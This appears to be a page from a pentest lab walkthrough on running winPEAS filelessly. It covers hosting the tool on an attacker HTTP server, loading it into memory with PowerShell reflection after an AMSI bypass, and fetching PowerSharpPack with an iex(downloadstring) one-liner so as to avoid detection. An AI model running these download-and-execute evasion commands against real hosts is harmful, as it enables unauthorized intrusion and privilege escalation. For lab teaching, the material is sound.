winPeas without touching disk

  • My favorite tools to look for privilege escalation is without a doubt winpeas

  • We already bypass amsi on the previous step, what we can do now to avoid detection is put winpeas on an http server and load it in memory

  • This article explain very well how to load and run an assembly with powershell full in memory.

cd /var/www/html
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
python3 -m http.server 8080

  • And play winPeas from memory with the following powershell commands (As winPeas is in .net we load the assembly and run it directly) :

$data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/winPEASany_ofs.exe');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);
[winPEAS.Program]::Main("");[Console]::SetOut($out);$sWriter.ToString()

  • WinPeas take several minutes to complete and give the prompt back with all the info (without the capture of the console out the output is empty in our basic powershell reverseshell, if you got a “real” shell you don’t have to do that and just launch the [winPEAS.Program]::Main(""); without the console stuff, thanks to PowerSharpPack code for the trick)

  • If you don’t want to be bored to compile .net app or modify them with public class and method and no exit.environment you can also use PowerSharpPack and get everything done for you (thanks again to @ShitSecure).

iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -winPEAS

  • And we get the information of SEImpersonate Privilege to use for escalation

Packing your .net binary for powershell

  • If you don’t want to use binary from internet (and you should don’t use pre-compiled code grabbed on github on your pentest mission), you can also pack you own binary with the following script : EncodeAssembly.ps1

  • This script is a modification of the one from @snovvcrash website and some code of PowerSharpPack.

  • Pack with the following commands :

. .\EncodeAssembly.ps1
Invoke-EncodeAssembly -binaryPath winPEAS.exe -namespace winPEAS -capture $true

  • To be use as reflective assembly in powershell remember you should avoid environment.exit() in the .net code and also you must set the class and the main method public.

PreviousPrivesc SeImpersonatePrivilegeNextSeImpersonatePrivilege to Authority\system

Last updated